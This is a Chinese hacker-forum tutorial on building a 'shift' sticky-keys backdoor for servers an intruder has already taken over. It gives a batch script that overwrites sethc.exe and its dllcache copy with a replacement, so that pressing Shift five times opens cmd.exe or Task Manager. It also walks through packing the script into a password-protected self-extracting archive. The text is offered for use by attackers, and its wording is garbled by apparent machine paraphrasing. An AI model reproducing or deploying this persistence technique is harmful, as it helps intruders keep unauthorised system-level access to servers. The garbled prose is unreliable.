服务器自解压shift后门

服务器自解压shift后门

编程入门hacker2018-07-17 6:21:409972A+A-

许多当时人们取得每台虚拟主机以后都是留有1个后门程序便捷到时候进到.

虚拟主机较为流行的也是shift侧门,也修改虚拟主机内置的粘滞键为人们的侧门文档

启用方式:按持续按五下Shift只能调成

假若虚拟主机的管理人员发觉按五下shift调出去的没有如图所示的的粘滞键那麼你的虚拟主机显然是被他人侵入了。

QQ截屏20141130093641

好啦进到主題这儿黒吧安全防护网教大伙儿手工定制塑造虚拟主机自压解shift侧门

 服务器自解压shift后门 第1张

一、新创建1个shift.bat批处理內容给出

 

copy shift.exe %systemroot%\system32\sethc.exe /y

copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc.exe /y

cmd.exe

略微懂点能看出左右二段编码的含意是将shift.exe重命名为sethc.exe且修改体系盘符拷贝到体系盘符下的 最终的cmd.exe 即启用出cmd对话框。

 

黑客动画吧网编本人喜爱修改资源管理器也也是立即调成资源管理器(将要cmd.exe改动为taskmgr.exe)

 

二、未来shift.bat加上到压缩文件

右健shift.bat–加上到压缩文件(建立自压解文件类型压缩文件加上勾)–然后点击高級–点一下密码设置–然后点击明确–点一下自压解选择项。。。

后边不愿打过 大伙儿自身看给出动态图片设定吧

 

到此设定进行点一下主屏幕转化成的shift.exe输入验证码只能自動安裝进行。按五下shift只能完成启用了


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 离鸢饮酎2022-05-29 13:25:31
  • 懂点能看出左右二段编码的含意是将shift.exe重命名为sethc.exe且修改体系盘符拷贝到体系盘符下的 最终的cmd.exe 即启用出cmd对话框。 黑客动画吧网编本人喜爱修改资源管理器也也是立即调成资源管理器(将要cmd.exe改动为
  • 馥妴婉绾2022-05-29 13:39:27
  • xe %systemroot%\system32\sethc.exe /ycopy %systemroot%\system32\sethc.exe %systemroo

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理